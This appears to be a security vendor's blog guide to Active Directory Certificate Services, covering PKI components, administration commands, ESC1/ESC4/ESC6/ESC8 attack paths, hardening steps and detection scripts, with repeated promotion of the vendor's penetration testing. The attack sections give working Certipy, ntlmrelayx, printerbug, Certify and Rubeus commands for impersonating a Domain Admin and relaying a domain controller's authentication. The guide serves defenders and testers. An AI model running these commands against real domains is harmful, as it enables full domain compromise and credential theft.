March 27, 2026

Active Directory Certificate Services (AD CS) is one of Microsoft's most powerful yet frequently misunderstood infrastructure components. It forms the backbone of Public Key Infrastructure (PKI) in enterprise Windows environments, enabling organizations to issue and manage digital certificates for authentication, encryption, and code signing. However, AD CS has increasingly become a prime target for attackers, with misconfigured certificate templates offering a fast lane to domain compromise.

This guide breaks down what AD CS is, how it works, common attack paths, and how your organization can stay protected.

What Is Active Directory Certificate Services?

AD CS is a Windows Server role that allows organizations to build and operate their own PKI. Rather than relying on third-party certificate authorities (CAs), enterprises can issue X.509 digital certificates internally, controlling every aspect of certificate lifecycle management.

At its core, AD CS serves several critical functions:

  • Authenticating users, computers, and services via smart cards and certificate-based login
  • Enabling encrypted communications through TLS/SSL
  • Supporting code signing to verify software integrity
  • Facilitating S/MIME for secure email

When deployed and configured correctly, AD CS is a robust trust anchor. When misconfigured, it becomes one of the most dangerous privilege escalation vectors in an Active Directory environment.

If your organization relies on AD CS and you want to know whether your PKI configuration is truly secure, Redfox Cybersecurity's penetration testing services can help identify gaps before attackers do.

Core Components of AD CS

Certification Authority (CA)

The CA is the heart of AD CS. It issues, revokes, and manages certificates. A CA plays one of two roles in the hierarchy, and each role is installed either as an Enterprise CA (domain-joined, integrated with Active Directory and certificate templates) or a Standalone CA (no AD integration, requests approved by hand):

Root CA: The topmost trust anchor in the PKI hierarchy. It should be kept offline for security.

Subordinate (Issuing) CA: The CA that directly issues certificates to end entities. This is the CA that users and machines interact with day to day.

Certificate Templates

Certificate templates define the rules for how a certificate can be issued, including who can request it, what Extended Key Usages (EKUs) it supports, and whether the requester can supply their own Subject Alternative Name (SAN). Template misconfigurations are the number one source of AD CS vulnerabilities.

Certificate Revocation List (CRL) and OCSP

These mechanisms allow clients to verify that a certificate has not been revoked. Unreachable or stale CRL distribution points are a common misconfiguration: clients that check revocation strictly start failing authentication, while clients configured to fail open keep accepting certificates that have actually been revoked.

Web Enrollment Interface

AD CS ships with an optional web enrollment interface (certsrv) that lets users request certificates via a browser. This service, when left enabled without proper controls, is frequently abused in NTLM relay attacks.

Setting Up AD CS: Essential Commands

Understanding AD CS starts with knowing how to interact with it at the command line. Below are practical commands that administrators and security professionals use regularly.

Installing the AD CS Role

Install-WindowsFeature -Name AD-Certificate -IncludeManagementTools

Configuring a Standalone Root CA

Install-AdcsCertificationAuthority `
 -CAType StandaloneRootCA `
 -CACommonName "CorpRootCA" `
 -KeyLength 4096 `
 -HashAlgorithmName SHA256 `
 -ValidityPeriod Years `
 -ValidityPeriodUnits 10

Configuring a Subordinate Enterprise CA

# -ParentCA requires the parent CA to be online to sign the subordinate's request.
# With an offline root, omit -ParentCA and add -OutputCertRequestFile <path>; carry the
# request to the root, sign it there, then install the returned certificate with certutil -installcert.
Install-AdcsCertificationAuthority `
 -CAType EnterpriseSubordinateCA `
 -CACommonName "CorpIssuingCA" `
 -ParentCA "CorpRootCA\CorpRootCA" `
 -KeyLength 2048 `
 -HashAlgorithmName SHA256

Listing All Published Certificate Templates

certutil -CATemplates

Requesting a Certificate from the Command Line

certreq -new request.inf mycert.csr
certreq -submit -attrib "CertificateTemplate:User" mycert.csr mycert.cer
certreq -accept mycert.cer
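The three certreq steps above depend on a request.inf that the article does not show. The following is an added example, not code from the original article: it writes a minimal INF, generates the request, submits it to a named CA so certreq does not stop at an interactive CA picker, and installs the result. The CA config string CA-SERVER\CorpIssuingCA, the subject, the template name and the file names are assumptions.

```powershell
# Added example (not from the original article): request.inf plus the full certreq round trip.
# Assumptions: CA config string CA-SERVER\CorpIssuingCA, template "User", subject and file names.
$inf = @'
[Version]
Signature = "$Windows NT$"

[NewRequest]
; Subject is ignored by templates that build the name from AD (the User template does)
Subject = "CN=john,OU=Staff,DC=corp,DC=local"
ProviderName = "Microsoft Software Key Storage Provider"
KeyAlgorithm = RSA
KeyLength = 2048
HashAlgorithm = sha256
; keep the private key non-exportable; use MachineKeySet = TRUE (elevated) for computer certificates
Exportable = FALSE
MachineKeySet = FALSE
; Digital Signature + Key Encipherment
KeyUsage = 0xA0
RequestType = PKCS10

[RequestAttributes]
CertificateTemplate = User
'@
Set-Content -Path .\request.inf -Value $inf -Encoding ASCII

# 1. Generate the key pair (stored in the current user's store) and the PKCS#10 request
certreq -new .\request.inf .\mycert.req
# 2. Submit to a named CA; -config avoids the interactive CA picker and is required in scripts
certreq -submit -config "CA-SERVER\CorpIssuingCA" .\mycert.req .\mycert.cer
# 3. Bind the issued certificate to its private key in the user's store
certreq -accept .\mycert.cer
```

The INF's [RequestAttributes] section does the same job as the -attrib "CertificateTemplate:User" switch shown above; use one or the other.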

Viewing CA Information

certutil -dump
certutil -getreg CA\CRLPublicationURLs
certutil -getreg CA\CACertPublicationURLs

Enumerating All CAs in the Forest

certutil -ADCA
Get-ADObject -SearchBase "CN=Enrollment Services,CN=Public Key Services,CN=Services,$((Get-ADRootDSE).configurationNamingContext)" -LDAPFilter '(objectClass=pKIEnrollmentService)' -Properties dNSHostName | Select-Object Name, dNSHostName

These commands form the foundation of everyday AD CS administration, but they are equally important for security assessments. Redfox Cybersecurity's experts use this knowledge in real-world penetration tests to evaluate your environment just as a real attacker would.

How Attackers Abuse AD CS

The 2021 whitepaper "Certified Pre-Owned" by Will Schroeder and Lee Christensen of SpecterOps brought widespread attention to AD CS attack paths and introduced the ESC numbering used below. Here are the most commonly exploited ones.

ESC1: Misconfigured Certificate Templates (SAN Abuse)

This is the most prevalent and devastating misconfiguration. A template is ESC1-vulnerable when all of the following hold: enrollment is granted to a broad group such as Domain Users; no manager approval or authorized signature is required; the EKU permits client authentication (Client Authentication, Smart Card Logon, PKINIT Client Authentication, Any Purpose, or no EKU at all); and the CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT flag lets the enrollee supply the Subject Alternative Name (SAN). An attacker can then request a certificate whose SAN names any user, including a Domain Admin, and the CA will issue it.

Enumerating vulnerable templates using Certipy:

certipy find -u john@corp.local -p 'Password123' -dc-ip 10.10.10.10

Exploiting ESC1 to impersonate a Domain Admin:

certipy req -u john@corp.local -p 'Password123' \
 -ca CORP-CA -template VulnTemplate \
 -upn administrator@corp.local \
 -dc-ip 10.10.10.10

Authenticating with the obtained certificate:

certipy auth -pfx administrator.pfx -dc-ip 10.10.10.10

This yields a TGT and NTLM hash for the administrator account, leading to full domain compromise.
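Because ESC1 is the conjunction of several template settings, an audit has to test all of them rather than only the SAN flag. The script below is an added example, not Certipy's or the article's own code, and generalises the single-template case above: it walks every template in the Configuration partition and reports those that are simultaneously enrollable by a broad group, free of manager approval and authorized signatures, usable for client authentication, and let the enrollee supply the subject, noting whether any CA publishes the template. It assumes a domain-joined host with the ActiveDirectory RSAT module and read access to the Configuration partition.

```powershell
# Added example (not from the original article): report every template meeting all ESC1 conditions.
# Needs the ActiveDirectory RSAT module and read access to the Configuration partition.
Import-Module ActiveDirectory

$pkiBase = "CN=Public Key Services,CN=Services,$((Get-ADRootDSE).configurationNamingContext)"

# Bits and OIDs as defined in MS-CRTD
$CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x00000001   # msPKI-Certificate-Name-Flag
$CT_FLAG_PEND_ALL_REQUESTS         = 0x00000002   # msPKI-Enrollment-Flag (manager approval)
$EnrollRight     = [guid]'0e10c968-78fb-11d1-a9c0-0000f80367c1'
$AutoEnrollRight = [guid]'a05b8cc2-17bc-4802-a710-e7c15ab866a2'
$AuthEkus = '1.3.6.1.5.5.7.3.2',        # Client Authentication
            '1.3.6.1.5.2.3.4',          # PKINIT Client Authentication
            '1.3.6.1.4.1.311.20.2.2',   # Smart Card Logon
            '2.5.29.37.0'               # Any Purpose
# Everyone, Authenticated Users, Domain Users (RID 513), Domain Computers (RID 515)
$BroadSidPattern = '^(S-1-1-0|S-1-5-11)$|-(513|515)$'

# A template is only reachable if at least one enrollment service (CA) lists it
$published = Get-ADObject -SearchBase "CN=Enrollment Services,$pkiBase" `
    -LDAPFilter '(objectClass=pKIEnrollmentService)' -Properties certificateTemplates |
    ForEach-Object { $_.certificateTemplates } | Sort-Object -Unique

function Get-BroadEnroller {
    # First broad principal allowed to Enroll/AutoEnroll (or holding full control) on the template
    param([System.DirectoryServices.ActiveDirectorySecurity]$Sd)
    $ext = [System.DirectoryServices.ActiveDirectoryRights]::ExtendedRight
    $all = [System.DirectoryServices.ActiveDirectoryRights]::GenericAll
    foreach ($ace in $Sd.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        try   { $sid = $ace.IdentityReference.Translate([System.Security.Principal.SecurityIdentifier]).Value }
        catch { continue }     # principal could not be resolved; skip it
        if ($sid -notmatch $BroadSidPattern) { continue }
        $enroll = $ace.ActiveDirectoryRights.HasFlag($ext) -and
                  ($ace.ObjectType -in @($EnrollRight, $AutoEnrollRight, [guid]::Empty))
        if ($enroll -or $ace.ActiveDirectoryRights.HasFlag($all)) { return $ace.IdentityReference.Value }
    }
}

Get-ADObject -SearchBase "CN=Certificate Templates,$pkiBase" `
    -LDAPFilter '(objectClass=pKICertificateTemplate)' `
    -Properties 'msPKI-Certificate-Name-Flag', 'msPKI-Enrollment-Flag', 'msPKI-RA-Signature',
                'pKIExtendedKeyUsage', 'msPKI-Certificate-Application-Policy', 'nTSecurityDescriptor' |
ForEach-Object {
    $t = $_
    # EKUs live in pKIExtendedKeyUsage; v2+ templates repeat them as application policies
    $ekus = @(@($t.pKIExtendedKeyUsage) + @($t.'msPKI-Certificate-Application-Policy') |
              Where-Object { $_ } | Sort-Object -Unique)
    $suppliesSubject    = ($t.'msPKI-Certificate-Name-Flag' -band $CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT) -ne 0
    $managerApproval    = ($t.'msPKI-Enrollment-Flag' -band $CT_FLAG_PEND_ALL_REQUESTS) -ne 0
    $signaturesRequired = [int]$t.'msPKI-RA-Signature'
    $clientAuth         = ($ekus.Count -eq 0) -or [bool]($ekus | Where-Object { $_ -in $AuthEkus })
    $enroller           = Get-BroadEnroller $t.nTSecurityDescriptor
    if ($suppliesSubject -and -not $managerApproval -and $signaturesRequired -eq 0 -and $clientAuth -and $enroller) {
        [pscustomobject]@{
            Template  = $t.Name
            Published = ($t.Name -in $published)
            Enroller  = $enroller
            EKU       = ($ekus -join ', ')
        }
    }
} | Format-Table -AutoSize
```

Any row with Published = True is directly exploitable with the certipy req command shown above; an unpublished row is a latent finding that becomes live the moment an operator publishes the template.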

ESC8: NTLM Relay to AD CS Web Enrollment

If the CA web enrollment endpoint (certsrv) is reachable over plain HTTP, or over HTTPS without Extended Protection for Authentication (EPA), an attacker can coerce a domain controller into authenticating to a host they control (for example with PetitPotam or the printer bug) and relay that NTLM authentication to certsrv to obtain a certificate for the DC's machine account. Authenticating with that certificate yields the DC's TGT, which is enough for a DCSync attack.

Setting up the relay with Impacket's ntlmrelayx, krbrelayx's printerbug.py and Certipy:

# Terminal 1: Start relay server pointing to CA web enrollment
ntlmrelayx.py -t http://CA-SERVER/certsrv/certfnsh.asp \
 -smb2support --adcs --template DomainController

# Terminal 2: Coerce the DC into authenticating to the attacker host (printerbug.py ships with krbrelayx)
printerbug.py corp.local/john:Password123@DC01.corp.local ATTACKER-IP

# ntlmrelayx prints the issued certificate as a base64-encoded PFX; decode it to dc01.pfx before the next step

Authenticate using the relayed certificate:

certipy auth -pfx dc01.pfx -dc-ip 10.10.10.10

ESC4: Vulnerable Certificate Template ACLs

If a low-privileged user has write permissions over a certificate template object in Active Directory, they can modify the template to introduce an ESC1-style misconfiguration and then exploit it.

List the principals holding write rights over each template (anything beyond Enterprise Admins, Domain Admins and the built-in Administrator deserves scrutiny):

$base = "CN=Certificate Templates,CN=Public Key Services,CN=Services,$((Get-ADRootDSE).configurationNamingContext)"
Get-ADObject -SearchBase $base -LDAPFilter '(objectClass=pKICertificateTemplate)' -Properties nTSecurityDescriptor | ForEach-Object { $t = $_.Name
 $_.nTSecurityDescriptor.Access | Where-Object { $_.AccessControlType -eq 'Allow' -and $_.ActiveDirectoryRights -match 'GenericAll|WriteDacl|WriteOwner|WriteProperty' } |
  Select-Object @{n='Template';e={$t}}, IdentityReference, ActiveDirectoryRights }

ESC6: EDITF_ATTRIBUTESUBJECTALTNAME2 Flag

When this flag is set on a CA, any certificate request, regardless of the template, can include attacker-specified SANs. This is a CA-level misconfiguration rather than a template-level one.

Check for this flag:

certutil -getreg Policy\EditFlags

certutil decodes the value, so if the output lists EDITF_ATTRIBUTESUBJECTALTNAME2 (bit 0x40000, decimal 262144) the CA is vulnerable: a SAN can then be injected through the request attributes of any template that permits client authentication.

These are just a few of the thirteen-plus ESC (Escalation) paths documented in the wild. A comprehensive AD CS audit performed by a skilled red team is the most reliable way to know your exposure level. The team at Redfox Cybersecurity specializes in Active Directory attacks, including full AD CS assessments.

Defending and Hardening AD CS

Audit Certificate Templates Regularly

Use Certipy or PSPKIAudit to enumerate all templates and flag dangerous configurations.

# Using Certipy to find all misconfigurations
certipy find -u john@corp.local -p 'Password123' -dc-ip 10.10.10.10 -vulnerable -stdout
# Using PSPKIAudit
Import-Module PSPKIAudit
Invoke-PKIAudit

Restrict Enrollment Permissions

Never grant enrollment rights to broad groups like Domain Users or Authenticated Users unless absolutely necessary. Apply the principle of least privilege to all templates.

Disable Unused Templates

certutil -SetCATemplates -<TemplateName>

Review all published templates and unpublish any that are not actively in use. The leading minus removes the named template from the CA's published list (a plus adds it); confirm the result with certutil -CATemplates.

Disable Web Enrollment If Not Required

Remove-WindowsFeature ADCS-Web-Enrollment

If web enrollment must remain active, enforce HTTPS and enable Extended Protection for Authentication (EPA) to prevent NTLM relay attacks.
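The two CA-level settings that matter most are the EDITF_ATTRIBUTESUBJECTALTNAME2 bit (ESC6) and whether the Web Enrollment application still accepts NTLM over plain HTTP or without EPA (ESC8). The script below is an added example, not the article's own code: it reads both from the CA host and provides a remediation function for the IIS side. It assumes the WebAdministration module is available, that the application lives at the role service's default location Default Web Site/CertSrv, and that it runs elevated on the CA.

```powershell
# Added example (not from the original article): CA-level posture check for ESC6 and ESC8.
# Run elevated on the CA host. Assumes the Web Enrollment application at 'Default Web Site/CertSrv'.
Import-Module WebAdministration

$EDITF_ATTRIBUTESUBJECTALTNAME2 = 0x00040000
$Site = 'Default Web Site'                    # assumption: defaults created by the role service
$App  = 'CertSrv'
$Loc  = @{ PSPath = 'MACHINE/WEBROOT/APPHOST'; Location = "$Site/$App" }
$AccessFilter = 'system.webServer/security/access'
$EpaFilter    = 'system.webServer/security/authentication/windowsAuthentication/extendedProtection'

function Get-AdcsCaPosture {
    $cfg    = 'HKLM:\SYSTEM\CurrentControlSet\Services\CertSvc\Configuration'
    $caName = (Get-ItemProperty -Path $cfg).Active
    $policy = "$cfg\$caName\PolicyModules\CertificateAuthority_MicrosoftDefault.Policy"
    $flags  = (Get-ItemProperty -Path $policy -Name EditFlags).EditFlags

    $webEnrollment = Test-Path "IIS:\Sites\$Site\$App"
    $ssl = $epa = $null
    if ($webEnrollment) {
        $ssl = (Get-WebConfiguration -Filter $AccessFilter @Loc).sslFlags     # e.g. 'None' or 'Ssl'
        $epa = (Get-WebConfiguration -Filter $EpaFilter @Loc).tokenChecking   # 'None', 'Allow', 'Require'
    }
    $requireSsl = [bool]($ssl -match '\bSsl\b')
    [pscustomobject]@{
        CA                   = $caName
        EditFlags            = ('0x{0:X}' -f $flags)
        ESC6_SanFlagSet      = (($flags -band $EDITF_ATTRIBUTESUBJECTALTNAME2) -ne 0)
        WebEnrollmentPresent = $webEnrollment
        RequireSsl           = $requireSsl
        ExtendedProtection   = $epa
        ESC8_Exposed         = ($webEnrollment -and (-not $requireSsl -or $epa -ne 'Require'))
    }
}

function Repair-AdcsWebEnrollment {
    # Require TLS and EPA on the enrollment application (the site also needs an https binding)
    Set-WebConfigurationProperty -Filter $AccessFilter -Name sslFlags -Value 'Ssl' @Loc
    Set-WebConfigurationProperty -Filter $EpaFilter -Name tokenChecking -Value 'Require' @Loc
}

$posture = Get-AdcsCaPosture
$posture | Format-List
if ($posture.ESC6_SanFlagSet) {
    Write-Warning "EDITF_ATTRIBUTESUBJECTALTNAME2 is set on $($posture.CA); clear it with certutil -setreg Policy\EditFlags -EDITF_ATTRIBUTESUBJECTALTNAME2 and restart certsvc"
}
if ($posture.ESC8_Exposed) {
    Write-Warning "Web Enrollment accepts NTLM without TLS/EPA; review, then run Repair-AdcsWebEnrollment"
}
```

Repair-AdcsWebEnrollment only changes the application's requirements; make sure the site has an HTTPS binding with a valid certificate first, or enrollment clients will simply be locked out.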

Remove the EDITF_ATTRIBUTESUBJECTALTNAME2 Flag

certutil -setreg Policy\EditFlags -EDITF_ATTRIBUTESUBJECTALTNAME2
net stop certsvc && net start certsvc

Enable Audit Logging on the CA

certutil -setreg CA\AuditFilter 127
net stop certsvc && net start certsvc

This enables all seven audit categories (start/stop the service = 1, back up/restore the database = 2, issue and manage requests = 4, change CA configuration = 8, change CA security settings = 16, store/retrieve archived keys = 32, revoke certificates and publish CRLs = 64; 127 is their sum). The filter only selects which events the CA is willing to report: the Security log records them only if the Certification Services audit subcategory (under Object Access) is also enabled through audit policy on the CA. Forward these logs to your SIEM; the events worth alerting on include 4886 (request received), 4887 (request approved and certificate issued), 4888 (request denied), 4885 (audit filter changed), 4891 (configuration entry changed) and 4899/4900 (template updated / template security updated).

Monitor for Certificate-Based Authentication Anomalies

Watch for accounts authenticating via Kerberos PKINIT (certificate-based pre-authentication) that do not normally do so, particularly privileged accounts. On domain controllers this shows up in Event ID 4768 with Pre-Authentication Type 16 and populated certificate issuer, serial number and thumbprint fields; a first-ever PKINIT logon for an administrator, or a certificate issued by a CA you do not recognise, is a strong indicator of ESC1 or ESC8 exploitation.
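The signal described above lives in Event ID 4768 on domain controllers. The script below is an added example, not detection content from the original article: it parses 4768 events, flags PKINIT logons by members of privileged groups or with a certificate from an issuer outside an allow-list, and first runs against a constructed sample event so it can be tried without a DC. The privileged-group list, the issuer allow-list (CORP-CA, the CA name used in the article's examples) and the sample event are assumptions.

```powershell
# Added example (not from the original article): flag PKINIT logons (Event 4768, PreAuthType 16)
# for privileged accounts or from an unexpected issuer. Group list, issuer allow-list and the
# sample event below are assumptions; the sample's field layout follows the real 4768 schema.
$PrivilegedGroups = 'Domain Admins', 'Enterprise Admins', 'Schema Admins', 'Administrators'
$KnownIssuers     = 'CORP-CA'
$PA_PK_AS_REQ     = '16'    # 4768 Pre-Authentication Type used by PKINIT

function Get-PrivilegedSam {
    # Flattened recursive membership of the watched groups
    $PrivilegedGroups |
        ForEach-Object { Get-ADGroupMember -Identity $_ -Recursive -ErrorAction SilentlyContinue } |
        Select-Object -ExpandProperty SamAccountName -Unique
}

function ConvertFrom-Event4768 {
    # Turn one 4768 event (XML text, as returned by EventLogRecord.ToXml()) into a flat record
    param([Parameter(ValueFromPipeline)][string]$EventXml)
    process {
        $x = [xml]$EventXml
        $d = @{}
        foreach ($n in $x.Event.EventData.Data) { $d[$n.Name] = $n.'#text' }
        [pscustomobject]@{
            Time       = [datetime]$x.Event.System.TimeCreated.SystemTime
            User       = ($d['TargetUserName'] -replace '@.*$', '')   # strip a UPN suffix if present
            Client     = ($d['IpAddress'] -replace '^::ffff:', '')
            Pkinit     = ($d['PreAuthType'] -eq $PA_PK_AS_REQ)
            Issuer     = $d['CertIssuerName']
            Serial     = $d['CertSerialNumber']
            Thumbprint = $d['CertThumbprint']
        }
    }
}

function Find-SuspiciousPkinit {
    param([object[]]$Events, [string[]]$Privileged, [string[]]$Issuers)
    $Events | Where-Object { $_.Pkinit } | ForEach-Object {
        $reasons = @()
        if ($_.User -in $Privileged)                  { $reasons += 'privileged account' }
        if ($_.Issuer -and $_.Issuer -notin $Issuers) { $reasons += 'unknown issuer' }
        if ($reasons) { $_ | Add-Member -NotePropertyName Reason -NotePropertyValue ($reasons -join '; ') -PassThru }
    }
}

# Constructed sample event for a dry run without a DC
$Sample = @'
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System><EventID>4768</EventID><TimeCreated SystemTime="2026-03-27T10:15:00.000Z"/></System>
  <EventData>
    <Data Name="TargetUserName">administrator</Data>
    <Data Name="TargetDomainName">CORP.LOCAL</Data>
    <Data Name="IpAddress">::ffff:10.10.10.55</Data>
    <Data Name="PreAuthType">16</Data>
    <Data Name="CertIssuerName">CORP-CA</Data>
    <Data Name="CertSerialNumber">1A0000000F</Data>
    <Data Name="CertThumbprint">0123456789ABCDEF0123456789ABCDEF01234567</Data>
  </EventData>
</Event>
'@
Find-SuspiciousPkinit -Events ($Sample | ConvertFrom-Event4768) -Privileged 'administrator' -Issuers $KnownIssuers |
    Format-Table Time, User, Client, Issuer, Reason -AutoSize

# Live use: last 24 hours of 4768 from the local DC (or a forwarded-events collector)
$live = Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4768; StartTime = (Get-Date).AddDays(-1) } -ErrorAction SilentlyContinue |
        ForEach-Object { $_.ToXml() } | ConvertFrom-Event4768
Find-SuspiciousPkinit -Events $live -Privileged (Get-PrivilegedSam) -Issuers $KnownIssuers |
    Format-Table Time, User, Client, Issuer, Thumbprint, Reason -AutoSize
```

On the sample event the function reports administrator with the reason "privileged account". In production, keep a per-account baseline of issuer and thumbprint as well: a privileged user who legitimately logs on with a smart card every day is not the anomaly, a new certificate on that account is.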

AD CS in the Context of Modern Red Teaming

AD CS has become a standard pillar of Active Directory penetration testing. Modern red teams routinely include AD CS enumeration and exploitation as part of their internal network assessment workflow, and blue teams are increasingly building detections around these attack paths.

Certify (C# Tool for Windows Environments)

Certify.exe find /vulnerable
Certify.exe request /ca:CA-SERVER\CORP-CA /template:VulnTemplate /altname:administrator
# Certify prints the key and certificate as PEM; convert them to a PFX for Rubeus:
openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx

Rubeus (Kerberos Toolkit)

After obtaining a certificate via ESC1 or ESC8, Rubeus can be used to perform Pass-the-Certificate:

Rubeus.exe asktgt /user:administrator /certificate:admin.pfx /password:pfxpassword /ptt

This injects a TGT for the administrator directly into memory without ever knowing the account's password, a highly stealthy lateral movement technique.

Understanding how attackers chain these techniques together is essential for building effective defenses. If your internal security team lacks the bandwidth or expertise to perform this level of assessment, Redfox Cybersecurity's penetration testing team offers thorough Active Directory and AD CS engagements tailored to your environment.

Common Misconfigurations Checklist

Here is a quick reference for security teams auditing their AD CS deployment:

Template-Level Checks

  • CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT flag is set without restricting enrollment
  • Enrollment rights granted to Domain Users or Authenticated Users
  • No Manager Approval requirement on sensitive templates
  • EKU includes Smart Card Logon or Client Authentication on templates with open enrollment

CA-Level Checks

  • EDITF_ATTRIBUTESUBJECTALTNAME2 flag is enabled
  • Web enrollment accessible over HTTP (not HTTPS)
  • Extended Protection for Authentication not enabled on web enrollment
  • ManageCA or ManageCertificates rights on the CA (ESC7) held by non-admin accounts
  • Audit logging disabled

Operational Checks

  • Root CA is online (it should be offline)
  • CRL distribution points are accessible and current
  • No monitoring or alerting on certificate issuance events

Final Thoughts

Active Directory Certificate Services is far more than a certificate-issuing mechanism. It is a trust infrastructure that, when compromised, can grant attackers persistent, stealthy access across an entire domain. The rise of well-documented attack tooling like Certipy, Certify, and Rubeus means that any organization running AD CS without a proper security review is operating with significant blind spots.

Whether you are a sysadmin looking to understand what you have deployed, a security analyst building detections, or an executive trying to understand your risk exposure, the message is clear: AD CS deserves dedicated attention in your security program.

Redfox Cybersecurity offers specialized penetration testing and red team services that include comprehensive Active Directory and AD CS assessments. Their team identifies exploitable misconfigurations, validates attack paths, and provides actionable remediation guidance, giving you a clear picture of your PKI security posture before a real attacker gets there first.

Secure your AD CS environment today. Contact Redfox Cybersecurity to schedule a penetration test.